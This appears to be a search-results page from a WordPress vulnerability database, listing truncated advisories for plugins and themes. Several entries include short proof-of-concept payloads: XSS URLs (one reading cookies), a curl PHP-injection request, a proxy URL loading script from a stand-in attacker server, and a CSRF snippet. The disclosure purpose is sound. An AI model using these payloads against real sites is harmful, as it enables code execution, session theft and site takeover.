4359 matches found
Augmented Reality <= 1.2.0 - Unauthenticated PHP File Upload leading to RCE
The elFinder connector used allows upload of PHP files as the 'uploadAllow' options contains 'text/x-php'. This allows an unauthenticated user to upload PHP files, leading to a RCE vulnerability. The issue is similar to https://wpscan.com/vulnerability/10389 POST...
GDPR CCPA Compliance Support < 2.4 - Unauthenticated PHP Object Injection
The GDPR CCPA Compliance Support WordPress plugin was vulnerable to an Unauthenticated PHP Object Injection security vulnerability. The vulnerability could triggered within the "njtgdprallowpermissions" Base64 encoded cookie value...
Golo < 1.3.3 - Unauthenticated Reflected XSS
An Unauthenticated Reflected XSS vulnerability was discovered in the Golo theme v1.3.2 for WordPress. https://example.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3DalertXSS%2F%2F%22%3E&posttype=place...
Findus - Directory Listing < 1.1.15 - Authenticated Persistent XSS
Authenticated Persistent XSS vulnerability was discovered in the «Findus - Directory Listing WordPress Theme», tested version — v1.1.14. Injected payload will trigger in the admin dashboard, in the «My listings» page and on listing page itself. POST /submit-listing/ HTTP/1.1 Host: example.com...
WP DS FAQ Plus < 1.4.2 - Stored Cross-Site Scripting (XSS)
Weak security checks in the Question form. https://www.youtube.com/watch?v=UPYitCT9xtk...
Selio - Real Estate Directory <= 1.1 - SQL Injection & Persistent XSS
----- SQL Injection: ----- Vulnerable 'id' parameter is https://listing-themes.com/selio-wp/wp-admin/admin.php?page=ownlistingaddlisting=21 ----- Persistent XSS: ----- You need a new user account, then go to any property listing on the website and use 'ENQUIRY FORM' on the right sidebar. Or you...
API Bearer Auth <= 20181229 - Unauthenticated Reflected XSS
The server GET parameter of the swagger/swagger-config.yaml.php file is affected by a reflected XSS issue. /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=alert"XSS"...
UserPro <= 4.9.34 - Unauthenticated Reflected XSS
Edit WPscanTeam: August 26th, 2019 - Envato Notified September 2nd, 2019 - v4.9.34 released, still vulnerable September 24th, 2019 - v4.9.35 and 4.9.35.1 released, fixing the issue...
Rencontre < 3.2.2 - Authenticated Stored XSS via facebook parameter & SQL Injection
An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Affected Version Version: alert'XSS'// Encoded-Payload:...
Simple Membership <= 3.8.4 - Cross-Site Request Forgery (CSRF)
CSRF issue in the Bulk Operation menu tab https://youtu.be/HkTD8DhhwhM https://gofile.io/?c=zWYnLM - CSRF html files...
Gallery Photoblocks < 1.1.43 - Authenticated Reflected XSS
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability. When logged in with an account with administrator capabilities: https:///wp-admin/admin.php?page=photoblocks-edit&id="...
Zoner - Real Estate <= 4.1 - Reflected & Stored XSS
Weak security measures like bad input fields data filtering has been discovered in the 'Zoner - Real Estate WordPress Theme'. PoC Stored XSS Injection: Register on the demo website and go to https://zoner.fruitfulcode.com/author/yourlogin/?profile-page=myprofile page. Inside any text field type "...
LiveChat <= 3.7.2 - Unauthenticated Option Update/Reset and Stored XSS
The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechatemail option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page. CSRF and XSS fixed in...
UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
An XSS vulnerability that affects from version 2.13 to 4.9.23. POST /wp-admin/admin-ajax.php Host: domain.com action=userproshortcodetemplate&shortcode=userpro id=1 layout="float" collageperpage="20" emdpaginatetop="1" emdpaginate="1" emdgender="Gender,radi...
ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution
The plugin ProfileGrid – User Profiles, Groups and Communities versions prior to 2.8.6 is vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin. Send an authenticated POST request to...
File Manager <= 5.0.0 - Information Disclosure
The Giribaz File Manager plugin logged activity related to the plugin in /wp-content/uploads/file-manager/log.txt. If user edits wp-config.php file using this plugin, the wp-config.php contents get added to the file which is not protected and contains database credentials, salts, etc. These files...
buddypress-xprofile-custom-fields-type 2.6.3 - Authenticated Arbitrary File Deletion
Type user access: any user registered used in BuddyPress. $POST 'field' . $fieldid . 'hiddenfile' is not escaped. $POST 'field' . $fieldid . 'deleteimg' is not escaped. Code File: wp-conent/plugin/buddypress-xprofile-custom-fields-type/bp-xprofile-custom-fields-type.php Lines: 452, 472, 496, 513,...
MarketPress <= 3.2.6 - PHP Object Injection
The MarketPress plugin installs to a directory named wordpress-ecommerce versions 3.2.6 and prior are vulnerable to a PHP Object Injection attack from the cart cookie value stored in connection with this plugin. Send an object to the site using the mpglobalcart cookie value and it will be...
Embed Images in Comments <= 0.5 - Unauthenticated Stored XSS
Unescaped src and href attribute replacements allows breaking out of the generated replacement tags. A comment containing the following "image" http://codeseekah.com/1.jpg"onload="alert1".jpg will generate an alert box...
FormCraft - Premium WordPress Form Builder <= v3.2.31 - Authenticated Stored XSS
WordPress FormCraft Premium WordPress Form Builder versions 3.2.31 and below suffer from a persistent Cross-Site Scripting XSS vulnerability. Authenticated Stored XSS: New Form Heading Heading Text input field is vulnerable. The payload will execute when the form is displayed...
User Access Manager <= 2.0.8 - Authenticated Reflected Cross-Site Scripting (XSS)
Not patched in 2.0.0 despite what the advisory states. http://www.example.com/wp-admin/admin.php?page=uamusergroup&uamaction=editusergroup&userGroupId=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22...
My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection
The plugin my-geo-posts-free insecurely trusts serialized data submitted over HTTP requests. This opens up the site to a PHP object injection vulnerability potential exploit vector. Attack is exploitable over HTTP requests to sites with the my-geo-posts-free Plugin. The original researcher notifi...
WP Whois Domain <= 1.0.0 - Unauthenticated Cross-Site Scripting (XSS)
The plugin is still affected and has been closed...
N-Media Website Contact Form with File Upload - Arbitrary File Upload
The website-contact-form-with-file-upload WordPress plugin was affected by an Arbitrary File Upload security vulnerability...
WHIZZ <= 1.0.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The WHIZZ WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="alert1;"...
Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="alert1;"...
Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="alert1;"...
Sola Support Ticket <= 3.12 - XSS & Configuration Change
Any logged in user with any role and access to wp-admin in any way can update plugin settings including allowing HTML to be parsed. One can also change any notification messages to include JS which then can be used to obtain information by forgery. Make POST request to /wp-admin with parameters...
Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Job Manager WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Go to the job listings page /index.php/jobs/apply/, then click on "send through your résumé", add the payload '" to the email field. The JavaScript will be executed on the...
Syndication Links <= 1.0.2 - DOM Cross-Site Scripting (XSS)
The Syndication Links WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/syndication-links/genericons/example.html...
Amazon Product In a Post Plugin - SQL Injection
amazon-product-in-a-post.php - this plugin takes raw user values and uses it delete from the database. This query can be manipulated to perform SQL injection attacks. Line 40: $tempswe = $wpdb-query"DELETE FROM $wpdb-prefixamazoncache WHERE Cacheid ='$wp-queryvars'appip-cache-id'' LIMIT 1;"; sqlm...
WeeklyNews Premium Theme <= 2.2 - Cross-Site Scripting (XSS)
Vendor confirmed fixed in as 2.2.9 although this issue was not mentioned in the changelog. http://www.example.com/?s=test"...
Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement
The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method ‘crayon-theme-editor-save’ will call the 'save' function within the CrayonThemeEditorWP class, defined in...
Aspose.Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
The Aspose.Words Exporter WordPress plugin was affected by an Arbitrary File Download security vulnerability. The asposedocexporterdownload.php file of the plugin does not restrict access, check permission or validate the file parameter, allowing unauthenticated user to download any file from the...
Fraction Theme < 1.1.2 - Privilege Escalation
This vulnerability allows an attacker either authenticated or unauthenticated to escalate privileges on the site and have an admin account which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...
Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...
Ceceppa Multilingua <= 1.5.17 - Authenticated Reflected Cross-Site Scripting
The tab GET parameter in the plugin's settings is vulnerable to reflected XSS attacks. The PoC will be displayed once the issue has been remediated...
Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email()
An attacker could exploit this issue by convincing a user to click a specially crafted URL, which will send emails from the affected user’s WordPress email account. function run var targetUrl = "http://example.com/webpage"; var email = "[email protected]"; var subject = "PoC"; var content = "add...
CM Pop-Up banners < 1.4.11 - Authenticated Stored XSS
When saving a new campaign, a user with editpages capabilities can store scripts in the campaign’s pop-up content. The code can then be executed on every page on the website. A user with the editpages capability can store any script in the pop-up's content. The content is serialized and then save...
wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation
The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed. 1. Log in as Subscriber. 2. Scrape the page /wp-admin/index.php for the connection key. i.e. vie...
AccessAlly < 3.3.2 - Unauthenticated Arbitrary PHP Code Execution
Prior to version 3.3.2, this plugin allowed arbitrary PHP code execution through the loginerror function. This exploit is out in the wild now and actively being exploited. curl -Ls http://www.example.com/login/?loginerror=%3C?%20$a%20=%20getcwd;%20echo%20$a;%20?%3E...
Contextual Adminbar Color < 0.3 - Authenticated Stored Cross-Site Scripting Issue
The variable $message is not escaped : $message = sanitizetextfield $currentsettings'message' ; Then, it's printed in a value attribute : value="" Edit WPScanTeam: Put the payload below in the custom message field in the plugin's settings page Tools Adminbar Settings: " onfocus=alert2...
Computer Repair Shop < 2.0 - Authenticated Stored XSS
Computer Repair Shop is vulnerable to stored XSS. When a user has admin capabilities, malicious code can be submitted through the plugin's options. Fixed in version 2.0. The plugin's options provided a basic HTML validation, which could be bypassed by copying + pasting malicious code into the...
Donorbox 7.1~7.1.1 - Stored Cross-Site Scripting via Shortcode
In Donorbox WordPress plugin, one can perform an XSS attack via the included shortcode by inserting arbitrary HTML attributes. This vulnerability was introduced in v7.1 and fixed in v7.1.2. donate url='/?" autofocus onfocus="alertwindow" abitraryAttributeToValidateShortcodeParsing="'...
WP Google Review Slider <= 6.1 - Authenticated SQL Injection
tid parameter vulnerable to SQLi. Note WPScanTeam: v6.1 has been pathed directly in the tags https://plugins.trac.wordpress.org/browser/wp-google-places-review-slider/tags/6.1/admin/partials/templatesposts.phpL58. However the the issue can be verified with v6.0 sqlmap identified the following...
Custom Simple RSS <= 2.0.6 - CSRF
CSRF issue in the Custom Simple Rss Plugin https://youtu.be/R0VrTpjaRg https://gofile.io/?c=jmVseA - CSRF html file...
All-in-One WP Migration <= 6.97 - Authenticated Cross-Site Scripting (XSS)
An attacker would already have to be able to either compromise the database or gain access to a user account with high enough privileges to view the backup history, so some damage has already been done, but such an attacker could then also insert some XSS in order to compromise other admin users...
Block WP Login <= 1.3.0 - CSRF and Unauthorised Settings Update
Lack of CSRF and authorisation checks in the bwplconfigureslug function registered as an admininit action could allow attacker via CSRF, or unauthenticated using the admin-ajax.php to change the plugin settings located at /wp-admin/options-permalink.php and disable the protection offered. v1.3.1...
MapSVG Lite <= 3.2.3 - Cross-Site Request Forgery (CSRF)
CSRF in the mapsvgsave AJAX method...